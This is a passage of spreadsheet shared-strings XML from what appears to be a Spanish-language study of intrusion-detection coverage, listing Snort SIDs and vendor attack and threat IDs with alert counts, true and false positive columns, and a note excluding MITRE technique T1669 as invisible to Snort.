  <si>
    <t>2101071, 2100993, 1434, 1433, 1071, 1489, 1668, 993</t>
  </si>
  <si>
    <t>2101201 (4), 2027250 (3), 2101016 (2), 2027263 (2), 2049402 (1), 2101129 (1), 2027261 (1), 2022520 (1), 2101145 (1), 2010229 (1), 2019526 (1), 2101877 (1)</t>
  </si>
  <si>
    <t>2101201, 2027250, 2101016, 2027263, 2049402, 2101129, 2027261, 2022520, 2101145, 2010229, 2019526, 2101877</t>
  </si>
  <si>
    <t>12 (183), 2101201 (4), 2027250 (3), 2101016 (2), 2027263 (2), 2049402 (1), 2101129 (1), 2027261 (1), 2022520 (1), 2101145 (1), 2010229 (1), 2019526 (1), 2101877 (1)</t>
  </si>
  <si>
    <t>12, 2101201, 2027250, 2101016, 2027263, 2049402, 2101129, 2027261, 2022520, 2101145, 2010229, 2019526, 2101877</t>
  </si>
  <si>
    <t>12 (183), 41742 (48), 1213 (5), 882 (5), 1201 (4), 895 (4), 1288 (3), 1016 (2), 1141 (2), 1826 (2), 1129 (1), 2062 (1), 43285 (1), 940 (1), 937 (1), 33608 (1), 1662 (1), 1145 (1), 1301 (1), 879 (1), 1218 (1), 845 (1), 885 (1), 1206 (1), 1231 (1), 1543 (1), 1551 (1), 839 (1), 825 (1), 1606 (1), 886 (1), 42289 (1), 1877 (1), 1852 (1), 1520 (1), 1521 (1), 835 (1), 849 (1), 896 (1), 853 (1), 43290 (1), 887 (1)</t>
  </si>
  <si>
    <t>12, 41742, 1213, 882, 1201, 895, 1288, 1016, 1141, 1826, 1129, 2062, 43285, 940, 937, 33608, 1662, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1543, 1551, 839, 825, 1606, 886, 42289, 1877, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887</t>
  </si>
  <si>
    <t>2009885 (153), 2101201 (4), 2027250 (3), 2101288 (3), 2002752 (2), 2002749 (2), 2101016 (2), 2027263 (2), 2049402 (1), 2101129 (1), 2027261 (1), 2022520 (1), 2100937 (1), 2101662 (1), 2101145 (1), 2010229 (1), 2100884 (1), 2019526 (1), 2101877 (1), 2101852 (1)</t>
  </si>
  <si>
    <t>2009885, 2101201, 2027250, 2101288, 2002752, 2002749, 2101016, 2027263, 2049402, 2101129, 2027261, 2022520, 2100937, 2101662, 2101145, 2010229, 2100884, 2019526, 2101877, 2101852</t>
  </si>
  <si>
    <t>12 (183), 2009885 (153), 41742 (48), 1213 (5), 882 (5), 1201 (4), 895 (4), 2101201 (4), 1288 (3), 2027250 (3), 2101288 (3), 1016 (2), 1141 (2), 1826 (2), 2002752 (2), 2002749 (2), 2101016 (2), 2027263 (2), 1129 (1), 2062 (1), 43285 (1), 940 (1), 937 (1), 33608 (1), 1662 (1), 1145 (1), 1301 (1), 879 (1), 1218 (1), 845 (1), 885 (1), 1206 (1), 1231 (1), 1543 (1), 1551 (1), 839 (1), 825 (1), 1606 (1), 886 (1), 42289 (1), 1877 (1), 1852 (1), 1520 (1), 1521 (1), 835 (1), 849 (1), 896 (1), 853 (1), 43290 (1), 887 (1), 2049402 (1), 2101129 (1), 2027261 (1), 2022520 (1), 2100937 (1), 2101662 (1), 2101145 (1), 2010229 (1), 2100884 (1), 2019526 (1), 2101877 (1), 2101852 (1)</t>
  </si>
  <si>
    <t>12, 2009885, 41742, 1213, 882, 1201, 895, 2101201, 1288, 2027250, 2101288, 1016, 1141, 1826, 2002752, 2002749, 2101016, 2027263, 1129, 2062, 43285, 940, 937, 33608, 1662, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1543, 1551, 839, 825, 1606, 886, 42289, 1877, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887, 2049402, 2101129, 2027261, 2022520, 2100937, 2101662, 2101145, 2010229, 2100884, 2019526, 2101877, 2101852</t>
  </si>
  <si>
    <t>1213 (5), 882 (5), 1201 (4), 895 (4), 1288 (3), 1016 (2), 1141 (2), 1826 (2), 1129 (1), 2062 (1), 43285 (1), 940 (1), 937 (1), 1662 (1), 1145 (1), 1301 (1), 879 (1), 1218 (1), 845 (1), 885 (1), 1206 (1), 1231 (1), 1543 (1), 1551 (1), 839 (1), 825 (1), 1606 (1), 886 (1), 1877 (1), 1852 (1), 1520 (1), 1521 (1), 835 (1), 849 (1), 896 (1), 853 (1), 43290 (1), 887 (1)</t>
  </si>
  <si>
    <t>1213, 882, 1201, 895, 1288, 1016, 1141, 1826, 1129, 2062, 43285, 940, 937, 1662, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1543, 1551, 839, 825, 1606, 886, 1877, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887</t>
  </si>
  <si>
    <t>12 (183), 1213 (5), 882 (5), 2101201 (4), 1201 (4), 895 (4), 2027250 (3), 1288 (3), 2101016 (2), 2027263 (2), 1016 (2), 1141 (2), 1826 (2), 2049402 (1), 2101129 (1), 2027261 (1), 2022520 (1), 2101145 (1), 2010229 (1), 2019526 (1), 2101877 (1), 1129 (1), 2062 (1), 43285 (1), 940 (1), 937 (1), 1662 (1), 1145 (1), 1301 (1), 879 (1), 1218 (1), 845 (1), 885 (1), 1206 (1), 1231 (1), 1543 (1), 1551 (1), 839 (1), 825 (1), 1606 (1), 886 (1), 1877 (1), 1852 (1), 1520 (1), 1521 (1), 835 (1), 849 (1), 896 (1), 853 (1), 43290 (1), 887 (1)</t>
  </si>
  <si>
    <t>12, 1213, 882, 2101201, 1201, 895, 2027250, 1288, 2101016, 2027263, 1016, 1141, 1826, 2049402, 2101129, 2027261, 2022520, 2101145, 2010229, 2019526, 2101877, 1129, 2062, 43285, 940, 937, 1662, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1543, 1551, 839, 825, 1606, 886, 1877, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887</t>
  </si>
  <si>
    <t>17429 (4509)</t>
  </si>
  <si>
    <t>2008330 (3), 2000560 (3)</t>
  </si>
  <si>
    <t>17429 (4509), 2008330 (3), 2000560 (3)</t>
  </si>
  <si>
    <t>12 (3), 3 (3), 1 (1)</t>
  </si>
  <si>
    <t>12, 3, 1</t>
  </si>
  <si>
    <t>2043343 (4), 2044076 (4), 2012886 (1)</t>
  </si>
  <si>
    <t>2043343, 2044076, 2012886</t>
  </si>
  <si>
    <t>50447 (4), 12 (3), 3 (3), 24253 (2), 15935 (1), 1 (1)</t>
  </si>
  <si>
    <t>50447, 12, 3, 24253, 15935, 1</t>
  </si>
  <si>
    <t>2001117 (8), 2043343 (4), 2044076 (4), 2025364 (4), 2002752 (3), 2002749 (3), 2060512 (3), 2060507 (3), 2059172 (1), 2012886 (1)</t>
  </si>
  <si>
    <t>2001117, 2043343, 2044076, 2025364, 2002752, 2002749, 2060512, 2060507, 2059172, 2012886</t>
  </si>
  <si>
    <t>2001117 (8), 50447 (4), 2043343 (4), 2044076 (4), 2025364 (4), 12 (3), 3 (3), 2002752 (3), 2002749 (3), 2060512 (3), 2060507 (3), 24253 (2), 15935 (1), 1 (1), 2059172 (1), 2012886 (1)</t>
  </si>
  <si>
    <t>2001117, 50447, 2043343, 2044076, 2025364, 12, 3, 2002752, 2002749, 2060512, 2060507, 24253, 15935, 1, 2059172, 2012886</t>
  </si>
  <si>
    <t>2012886 (1)</t>
  </si>
  <si>
    <t>2012886</t>
  </si>
  <si>
    <t>50447 (4), 15935 (1)</t>
  </si>
  <si>
    <t>50447, 15935</t>
  </si>
  <si>
    <t>50447 (4), 15935 (1), 2012886 (1)</t>
  </si>
  <si>
    <t>50447, 15935, 2012886</t>
  </si>
  <si>
    <t>12 (3), 24253 (2)</t>
  </si>
  <si>
    <t>12, 24253</t>
  </si>
  <si>
    <t>2025364 (4), 2002752 (3), 2002749 (3)</t>
  </si>
  <si>
    <t>2025364, 2002752, 2002749</t>
  </si>
  <si>
    <t>2025364 (4), 12 (3), 2002752 (3), 2002749 (3), 24253 (2)</t>
  </si>
  <si>
    <t>2025364, 12, 2002752, 2002749, 24253</t>
  </si>
  <si>
    <t>3 (3), 1 (1)</t>
  </si>
  <si>
    <t>3, 1</t>
  </si>
  <si>
    <t>2043343 (4), 2044076 (4)</t>
  </si>
  <si>
    <t>2043343 (4), 2044076 (4), 3 (3), 1 (1)</t>
  </si>
  <si>
    <t>2043343, 2044076, 3, 1</t>
  </si>
  <si>
    <t>2001117 (8), 2043343 (4), 2044076 (4), 2060512 (3), 2060507 (3), 2059172 (1)</t>
  </si>
  <si>
    <t>2001117 (8), 2043343 (4), 2044076 (4), 3 (3), 2060512 (3), 2060507 (3), 1 (1), 2059172 (1)</t>
  </si>
  <si>
    <t>2001117, 2043343, 2044076, 3, 2060512, 2060507, 1, 2059172</t>
  </si>
  <si>
    <t>2002749 (3), 2060512 (3), 2060507 (3), 2054218 (2), 2002752 (1)</t>
  </si>
  <si>
    <t>2002749, 2060512, 2060507, 2054218, 2002752</t>
  </si>
  <si>
    <t>12 (7), 1325 (3), 2002749 (3), 2060512 (3), 2060507 (3), 2054218 (2), 5 (1), 4 (1), 2002752 (1)</t>
  </si>
  <si>
    <t>12, 1325, 2002749, 2060512, 2060507, 2054218, 5, 4, 2002752</t>
  </si>
  <si>
    <t>2002749 (3), 2054218 (2), 2002752 (1)</t>
  </si>
  <si>
    <t>2002749, 2054218, 2002752</t>
  </si>
  <si>
    <t>12 (7), 2002749 (3), 2054218 (2), 5 (1), 4 (1), 2002752 (1)</t>
  </si>
  <si>
    <t>12, 2002749, 2054218, 5, 4, 2002752</t>
  </si>
  <si>
    <t>2060512 (3), 2060507 (3)</t>
  </si>
  <si>
    <t>2060512, 2060507</t>
  </si>
  <si>
    <t>12 (3), 2002752 (2), 2002749 (2), 1325 (1), 2054218 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 1325, 2054218</t>
  </si>
  <si>
    <t>12 (3), 2002752 (2), 2002749 (2), 2054218 (1)</t>
  </si>
  <si>
    <t>2101411 (396), 2101417 (396), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2101411, 2101417, 2002752, 2002749</t>
  </si>
  <si>
    <t>1411 (396), 1417 (396), 2101411 (396), 2101417 (396), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>1411, 1417, 2101411, 2101417, 2002752, 2002749</t>
  </si>
  <si>
    <t>34789, 34795</t>
  </si>
  <si>
    <t>96504</t>
  </si>
  <si>
    <t>12 (24), 15259 (8), 50447 (1), 1325 (1)</t>
  </si>
  <si>
    <t>12, 15259, 50447, 1325</t>
  </si>
  <si>
    <t>2060512 (6), 2060507 (6), 2002749 (3), 2044770 (1), 2002822 (1), 2019240 (1)</t>
  </si>
  <si>
    <t>2060512, 2060507, 2002749, 2044770, 2002822, 2019240</t>
  </si>
  <si>
    <t>12 (24), 15259 (8), 2060512 (6), 2060507 (6), 2002749 (3), 50447 (1), 1325 (1), 2044770 (1), 2002822 (1), 2019240 (1)</t>
  </si>
  <si>
    <t>12, 15259, 2060512, 2060507, 2002749, 50447, 1325, 2044770, 2002822, 2019240</t>
  </si>
  <si>
    <t>50447 (1), 1325 (1)</t>
  </si>
  <si>
    <t>50447, 1325</t>
  </si>
  <si>
    <t>50447 (1), 1325 (1), 2019240 (1)</t>
  </si>
  <si>
    <t>50447, 1325, 2019240</t>
  </si>
  <si>
    <t>2019240 (1), 1325 (1)</t>
  </si>
  <si>
    <t>2019240, 1325</t>
  </si>
  <si>
    <t>2002749 (3), 2002822 (1)</t>
  </si>
  <si>
    <t>12 (24), 2002749 (3), 2002822 (1)</t>
  </si>
  <si>
    <t>12, 2002749, 2002822</t>
  </si>
  <si>
    <t>15259 (8)</t>
  </si>
  <si>
    <t>15259</t>
  </si>
  <si>
    <t>2060512 (6), 2060507 (6), 2044770 (1)</t>
  </si>
  <si>
    <t>2060512, 2060507, 2044770</t>
  </si>
  <si>
    <t>15259 (8), 2060512 (6), 2060507 (6), 2044770 (1)</t>
  </si>
  <si>
    <t>15259, 2060512, 2060507, 2044770</t>
  </si>
  <si>
    <t>599805</t>
  </si>
  <si>
    <t>32295, 86533</t>
  </si>
  <si>
    <t>15 (26), 33 (18), 18 (18), 3 (17), 1 (10), 12 (1)</t>
  </si>
  <si>
    <t>15, 33, 18, 3, 1, 12</t>
  </si>
  <si>
    <t>15 (26), 33 (18), 18 (18), 3 (17), 1 (10), 254 (3), 12 (1)</t>
  </si>
  <si>
    <t>15, 33, 18, 3, 1, 254, 12</t>
  </si>
  <si>
    <t>2013504 (157), 2001117 (108), 2002749 (12), 2022218 (12), 2002752 (2)</t>
  </si>
  <si>
    <t>2013504, 2001117, 2002749, 2022218, 2002752</t>
  </si>
  <si>
    <t>2013504 (157), 2001117 (108), 15 (26), 33 (18), 18 (18), 3 (17), 2002749 (12), 2022218 (12), 1 (10), 254 (3), 2002752 (2), 12 (1)</t>
  </si>
  <si>
    <t>2013504, 2001117, 15, 33, 18, 3, 2002749, 2022218, 1, 254, 2002752, 12</t>
  </si>
  <si>
    <t>2022218 (12)</t>
  </si>
  <si>
    <t>2022218</t>
  </si>
  <si>
    <t>15 (26), 1 (10), 12 (1)</t>
  </si>
  <si>
    <t>15, 1, 12</t>
  </si>
  <si>
    <t>15 (26), 1 (10), 254 (3), 12 (1)</t>
  </si>
  <si>
    <t>15, 1, 254, 12</t>
  </si>
  <si>
    <t>15 (26), 2002749 (12), 1 (10), 254 (3), 2002752 (2), 12 (1)</t>
  </si>
  <si>
    <t>15, 2002749, 1, 254, 2002752, 12</t>
  </si>
  <si>
    <t>33 (18), 18 (18), 3 (17)</t>
  </si>
  <si>
    <t>2013504 (157), 33 (18), 18 (18), 3 (17)</t>
  </si>
  <si>
    <t>2013504, 33, 18, 3</t>
  </si>
  <si>
    <t>2013504 (157), 2001117 (108)</t>
  </si>
  <si>
    <t>2013504, 2001117</t>
  </si>
  <si>
    <t>2013504 (157), 2001117 (108), 33 (18), 18 (18), 3 (17)</t>
  </si>
  <si>
    <t>2013504, 2001117, 33, 18, 3</t>
  </si>
  <si>
    <t>12 (39), 2002752 (5), 2002749 (5)</t>
  </si>
  <si>
    <t>1917 (4), 15935 (4), 15306 (2), 24303 (1), 16313 (1), 23861 (1), 1200 (1), 1 (1), 58160 (1), 12 (1)</t>
  </si>
  <si>
    <t>1917, 15935, 15306, 24303, 16313, 23861, 1200, 1, 58160, 12</t>
  </si>
  <si>
    <t>2100527 (39), 2001117 (12), 2002752 (2), 2002749 (2), 2003595 (1), 2018959 (1), 2101200 (1), 2059172 (1), 2035480 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2100527, 2001117, 2002752, 2002749, 2003595, 2018959, 2101200, 2059172, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>2100527 (39), 2001117 (12), 1917 (4), 15935 (4), 15306 (2), 2002752 (2), 2002749 (2), 24303 (1), 16313 (1), 23861 (1), 1200 (1), 1 (1), 58160 (1), 12 (1), 2003595 (1), 2018959 (1), 2101200 (1), 2059172 (1), 2035480 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2100527, 2001117, 1917, 15935, 15306, 2002752, 2002749, 24303, 16313, 23861, 1200, 1, 58160, 12, 2003595, 2018959, 2101200, 2059172, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>1917 (4), 1200 (1)</t>
  </si>
  <si>
    <t>15935 (4), 15306 (2), 16313 (1), 23861 (1), 58160 (1)</t>
  </si>
  <si>
    <t>15935, 15306, 16313, 23861, 58160</t>
  </si>
  <si>
    <t>2003595 (1), 2018959 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>15935 (4), 15306 (2), 16313 (1), 23861 (1), 58160 (1), 2003595 (1), 2018959 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>15935, 15306, 16313, 23861, 58160, 2003595, 2018959, 2000419, 2025644</t>
  </si>
  <si>
    <t>1200 (1), 1 (1), 12 (1)</t>
  </si>
  <si>
    <t>1200, 1, 12</t>
  </si>
  <si>
    <t>2100527 (39), 2002752 (2), 2002749 (2), 2101200 (1)</t>
  </si>
  <si>
    <t>2100527, 2002752, 2002749, 2101200</t>
  </si>
  <si>
    <t>2100527 (39), 2002752 (2), 2002749 (2), 1200 (1), 1 (1), 12 (1), 2101200 (1)</t>
  </si>
  <si>
    <t>2100527, 2002752, 2002749, 1200, 1, 12, 2101200</t>
  </si>
  <si>
    <t>1 (1), 12 (1), 1200 (1)</t>
  </si>
  <si>
    <t>1, 12, 1200</t>
  </si>
  <si>
    <t>1917 (4), 24303 (1)</t>
  </si>
  <si>
    <t>2001117 (12), 2059172 (1), 2035480 (1)</t>
  </si>
  <si>
    <t>2001117, 2059172, 2035480</t>
  </si>
  <si>
    <t>2001117 (12), 1917 (4), 24303 (1), 2059172 (1), 2035480 (1)</t>
  </si>
  <si>
    <t>2001117, 1917, 24303, 2059172, 2035480</t>
  </si>
  <si>
    <t>1917 (4), 2035480 (1)</t>
  </si>
  <si>
    <t>50447 (264), 12 (16), 1917 (4), 1 (2)</t>
  </si>
  <si>
    <t>50447, 12, 1917, 1</t>
  </si>
  <si>
    <t>50447 (264), 12 (16), 1917 (4), 2002752 (3), 2002749 (3), 1 (2)</t>
  </si>
  <si>
    <t>50447, 12, 1917, 2002752, 2002749, 1</t>
  </si>
  <si>
    <t>50447 (264)</t>
  </si>
  <si>
    <t>12 (16), 2002752 (3), 2002749 (3), 1 (2)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 1</t>
  </si>
  <si>
    <t>254, 1448, 42340, 384, 408, 29456, 449, 366, 372, 1917, 2924, 368, 42944, 1417, 1411, 385, 1394, 399, 402, 28556, 2049, 1280, 1201, 1616, 41978, 1413, 11968, 1010, 401, 28557, 382, 566, 373, 369, 453, 451, 895, 381, 2339, 404, 1418, 882, 1420, 31136, 2003, 2004, 28555, 2050, 2418, 1447, 579, 27899, 42255, 853, 1421, 396, 650, 649, 1735, 1852, 1546, 1136, 613</t>
  </si>
  <si>
    <t>42944, 41978, 34799</t>
  </si>
  <si>
    <t>42944 (6662), 41978 (328)</t>
  </si>
  <si>
    <t>2924 (13554), 42944 (6649), 1394 (957), 41978 (328), 31136 (34), 28555 (10), 2050 (10), 42255 (6), 1735 (3), 1546 (2)</t>
  </si>
  <si>
    <t>2924, 42944, 1394, 41978, 31136, 28555, 2050, 42255, 1735, 1546</t>
  </si>
  <si>
    <t>2011716 (13756), 2008578 (12944), 2010937 (5587), 2010935 (3620), 2101411 (2430), 2001219 (1963), 2019401 (1732), 2010939 (971), 2101280 (552), 2053892 (446), 2027757 (408), 2010936 (394), 2101616 (369), 2101413 (302), 2053893 (278), 2027413 (268), 2002911 (133), 2023640 (120), 2012296 (109), 2019102 (108), 2025822 (65), 2003068 (63), 2023753 (39), 2010938 (36), 2027412 (24), 2102003 (10), 2100579 (8), 2025712 (4), 2016778 (3), 2016683 (2), 2029340 (1), 2014380 (1)</t>
  </si>
  <si>
    <t>2011716, 2008578, 2010937, 2010935, 2101411, 2001219, 2019401, 2010939, 2101280, 2053892, 2027757, 2010936, 2101616, 2101413, 2053893, 2027413, 2002911, 2023640, 2012296, 2019102, 2025822, 2003068, 2023753, 2010938, 2027412, 2102003, 2100579, 2025712, 2016778, 2016683, 2029340, 2014380</t>
  </si>
  <si>
    <t>254, 42340, 29456, 1417, 1411, 385, 28556, 1280, 1201, 1616, 1413, 1010, 895, 2339, 1418, 882, 1420, 2003, 2004, 2418, 579, 27899, 853, 1421, 650, 649, 1852, 1136, 613</t>
  </si>
  <si>
    <t>2001330, 2102466, 2102465, 2100366, 2001972, 2100372, 2012709, 2100368, 2016149, 2012711, 2018124, 2027390, 2012710, 2013479, 2012712, 2100566, 2100373, 2100369, 2025275, 2038967, 2036252, 2050281, 2033078, 2100537, 2100538, 2015023</t>
  </si>
  <si>
    <t>1448, 384, 408, 449, 366, 372, 1917, 368, 399, 402, 2049, 11968, 401, 28557, 382, 566, 373, 369, 453, 451, 381, 404, 1447, 396</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>42944</t>
  </si>
  <si>
    <t>#Attack_Flows</t>
  </si>
  <si>
    <t>#Attack_Flows
AttackID</t>
  </si>
  <si>
    <t>#Attack_Flows
ThreatID</t>
  </si>
  <si>
    <t xml:space="preserve">    ADVIERTASE:· En un flujo:
 #Alertas diferentes por flujo = #SIDs diferentes que aparecen en ese flujo</t>
  </si>
  <si>
    <t xml:space="preserve"> #Alertas diferentes por flujo (1 Alerta/SID en cada flujo)</t>
  </si>
  <si>
    <t xml:space="preserve"> #Alertas diferentes por flujo (1 Alerta/attackid en cada flujo)</t>
  </si>
  <si>
    <t xml:space="preserve"> #Alertas diferentes por flujo (1 Alerta/attackid_o_appid en cada flujo)</t>
  </si>
  <si>
    <t xml:space="preserve"> #Alertas diferentes por flujo (1 Alerta/appid en cada flujo)</t>
  </si>
  <si>
    <t xml:space="preserve"> #Alertas diferentes por flujo (1 Alerta/threat_id en cada flujo)</t>
  </si>
  <si>
    <t xml:space="preserve"> #Alertas diferentes por flujo (1 Alerta/threat_id_o_appid en cada flujo)</t>
  </si>
  <si>
    <t>0.91%</t>
  </si>
  <si>
    <t>Nº Técnicas Implementadas:</t>
  </si>
  <si>
    <t>Nº Subtécnicas Implementadas</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">✔
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color rgb="FF0070C0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Salvo 1er paquete, NO afecta al ataque)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ADVERTIR: La técNica </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="16"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T1669</t>
    </r>
    <r>
      <rPr>
        <sz val="16"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> (detectable por red según MITRE) NO es visible para Snort =&gt; Se excluye del estudio</t>
    </r>
  </si>
  <si>
    <t>No prunning</t>
  </si>
  <si>
    <t>%Detection/pcap</t>
  </si>
  <si>
    <t>#Alerts TP</t>
  </si>
  <si>
    <t>#Alerts FP</t>
  </si>
  <si>
    <t>SIDs/AttackID/ThreatID o AppID removed</t>
  </si>
  <si>
    <t>#SIDs/AttackID/ThreatID o AppID removed</t>
  </si>
  <si>
    <t>35662 (1)</t>
  </si>
  <si>
    <t>29511 (2)</t>
  </si>
  <si>
    <t>52169 (4)</t>
  </si>
  <si>
    <t>10000483 (4)</t>
  </si>
  <si>
    <t>43814 (6)</t>
  </si>
  <si>
    <t>40169 (3)</t>
  </si>
  <si>
    <t>16206, 16195, 16060</t>
  </si>
  <si>
    <t>16195, 16060</t>
  </si>
  <si>
    <t>29511 (1)</t>
  </si>
  <si>
    <t>52169 (2), 35662 (1)</t>
  </si>
  <si>
    <t>52169, 35662</t>
  </si>
  <si>
    <t>16083, 34039, 16060</t>
  </si>
  <si>
    <t>46002 (8), 12449 (1)</t>
  </si>
  <si>
    <t>46002, 12449</t>
  </si>
  <si>
    <t>10000483 (2)</t>
  </si>
  <si>
    <t>15893 (1)</t>
  </si>
  <si>
    <t>12449 (6)</t>
  </si>
  <si>
    <t>44780 (248), 12699 (70), 13116 (6), 14734 (6), 12265 (2), 13056 (2), 12709 (2), 14950 (2), 14405 (2), 14338 (2), 14265 (2), 14266 (2), 12475 (1), 12426 (1), 29264 (1), 27560 (1), 12758 (1), 13801 (1), 14946 (1), 14955 (1), 13825 (1), 14374 (1), 14742 (1), 14406 (1), 14953 (1), 14856 (1), 14345 (1), 29263 (1)</t>
  </si>
  <si>
    <t>44780, 12699, 13116, 14734, 12265, 13056, 12709, 14950, 14405, 14338, 14265, 14266, 12475, 12426, 29264, 27560, 12758, 13801, 14946, 14955, 13825, 14374, 14742, 14406, 14953, 14856, 14345, 29263</t>
  </si>
  <si>
    <t>17702 (40), 48010 (21), 10574 (5), 14088 (4), 24975 (4), 29261 (3), 12933 (3), 12648 (2), 46767 (2), 13106 (2), 30908 (2), 12979 (2), 10003 (2), 15117 (2), 15115 (2), 14157 (2), 15116 (2), 15118 (2), 29564 (2), 15110 (2), 14230 (2), 29965 (2), 15229 (1), 15221 (1), 12909 (1), 12459 (1), 14305 (1), 29615 (1), 15100 (1), 14286 (1), 14404 (1), 15114 (1)</t>
  </si>
  <si>
    <t>17702, 48010, 10574, 14088, 24975, 29261, 12933, 12648, 46767, 13106, 30908, 12979, 10003, 15117, 15115, 14157, 15116, 15118, 29564, 15110, 14230, 29965, 15229, 15221, 12909, 12459, 14305, 29615, 15100, 14286, 14404, 15114</t>
  </si>
  <si>
    <t>56270 (49), 43336 (42), 10604 (36), 12015 (5), 50825 (4), 14743 (4), 15463 (3), 15091 (3), 14859 (3), 56146 (2), 15621 (2), 10181 (2), 12980 (2), 14848 (2), 14857 (2), 14956 (2), 14849 (2), 14873 (2), 14847 (2), 14740 (2), 15092 (2), 14949 (2), 14855 (2), 14736 (2), 29614 (2), 14484 (2), 12935 (1), 12560 (1), 12439 (1), 13011 (1), 29613 (1), 14957 (1), 14954 (1), 30542 (1), 14850 (1), 14942 (1), 14852 (1), 10819 (1), 14851 (1), 14952 (1), 14341 (1), 14858 (1), 15225 (1), 14948 (1), 31752 (1)</t>
  </si>
  <si>
    <t>56270, 43336, 10604, 12015, 50825, 14743, 15463, 15091, 14859, 56146, 15621, 10181, 12980, 14848, 14857, 14956, 14849, 14873, 14847, 14740, 15092, 14949, 14855, 14736, 29614, 14484, 12935, 12560, 12439, 13011, 29613, 14957, 14954, 30542, 14850, 14942, 14852, 10819, 14851, 14952, 14341, 14858, 15225, 14948, 31752</t>
  </si>
  <si>
    <t>12577 (1)</t>
  </si>
  <si>
    <t>15893, 15862</t>
  </si>
  <si>
    <t>17011 (2)</t>
  </si>
  <si>
    <t>43814 (6), 45360 (4)</t>
  </si>
  <si>
    <t>18157 (1)</t>
  </si>
  <si>
    <t>10000501 (1)</t>
  </si>
  <si>
    <t>46002 (2)</t>
  </si>
  <si>
    <t>15893 (908)</t>
  </si>
  <si>
    <t>34050, 32609, 17011, 16321</t>
  </si>
  <si>
    <t>52676 (2)</t>
  </si>
  <si>
    <t>15893 (4)</t>
  </si>
  <si>
    <t>48370 (20)</t>
  </si>
  <si>
    <t>16195 (197), 16250 (1)</t>
  </si>
  <si>
    <t>52169 (7)</t>
  </si>
  <si>
    <t>15893 (5)</t>
  </si>
  <si>
    <t>52676 (3)</t>
  </si>
  <si>
    <t>15893 (2)</t>
  </si>
  <si>
    <t>107937798 (1)</t>
  </si>
  <si>
    <t>52169 (2)</t>
  </si>
  <si>
    <t>34039, 15895</t>
  </si>
  <si>
    <t>34039 (2)</t>
  </si>
  <si>
    <t>12449 (1)</t>
  </si>
  <si>
    <t>29511 (7)</t>
  </si>
  <si>
    <t>110034946 (4), 110034945 (1)</t>
  </si>
  <si>
    <t>110034946, 110034945</t>
  </si>
  <si>
    <t>15893 (8)</t>
  </si>
  <si>
    <t>46002 (1), 12449 (1)</t>
  </si>
  <si>
    <t>15893 (212)</t>
  </si>
  <si>
    <t>12090 (5)</t>
  </si>
  <si>
    <t>10000483 (5)</t>
  </si>
  <si>
    <t>12090 (2)</t>
  </si>
  <si>
    <t>10000483 (3)</t>
  </si>
  <si>
    <t>49480 (3)</t>
  </si>
  <si>
    <t>15893 (3)</t>
  </si>
  <si>
    <t>34050, 16083</t>
  </si>
  <si>
    <t>15584 (12)</t>
  </si>
  <si>
    <t>15621 (37)</t>
  </si>
  <si>
    <t>15893 (44)</t>
  </si>
  <si>
    <t>15621 (1)</t>
  </si>
  <si>
    <t>46199 (86)</t>
  </si>
  <si>
    <t>15621 (64)</t>
  </si>
  <si>
    <t>29511 (8)</t>
  </si>
  <si>
    <t>12449 (4), 46002 (1)</t>
  </si>
  <si>
    <t>33106 (1)</t>
  </si>
  <si>
    <t>7929858 (1)</t>
  </si>
  <si>
    <t>15511 (1)</t>
  </si>
  <si>
    <t>17702 (224)</t>
  </si>
  <si>
    <t>15893 (115)</t>
  </si>
  <si>
    <t>43799 (1)</t>
  </si>
  <si>
    <t>43796 (2), 43963 (1), 12449 (1)</t>
  </si>
  <si>
    <t>43796, 43963, 12449</t>
  </si>
  <si>
    <t>10000483 (1)</t>
  </si>
  <si>
    <t>40511 (2)</t>
  </si>
  <si>
    <t>15893 (257)</t>
  </si>
  <si>
    <t>35766 (2)</t>
  </si>
  <si>
    <t>16195 (1)</t>
  </si>
  <si>
    <t>15921 (1)</t>
  </si>
  <si>
    <t>107937798 (31)</t>
  </si>
  <si>
    <t>46002 (3)</t>
  </si>
  <si>
    <t>40169 (10)</t>
  </si>
  <si>
    <t>16195, 15895, 16270</t>
  </si>
  <si>
    <t>29511 (6)</t>
  </si>
  <si>
    <t>12449 (2)</t>
  </si>
  <si>
    <t>29511 (5)</t>
  </si>
  <si>
    <t>12449 (2), 46002 (1)</t>
  </si>
  <si>
    <t>48370 (2)</t>
  </si>
  <si>
    <t>16206 (669), 16195 (8)</t>
  </si>
  <si>
    <t>16206, 16195</t>
  </si>
  <si>
    <t>107347977 (289007)</t>
  </si>
  <si>
    <t>30952 (317130)</t>
  </si>
  <si>
    <t>34038, 15893</t>
  </si>
  <si>
    <t>34039, 34050, 34041, 34552</t>
  </si>
  <si>
    <t>12525 (42930)</t>
  </si>
  <si>
    <t>16206 (11)</t>
  </si>
  <si>
    <t>16206 (5276)</t>
  </si>
  <si>
    <t>16206 (4856)</t>
  </si>
  <si>
    <t>16214 (1), 16250 (1)</t>
  </si>
  <si>
    <t>12588 (1)</t>
  </si>
  <si>
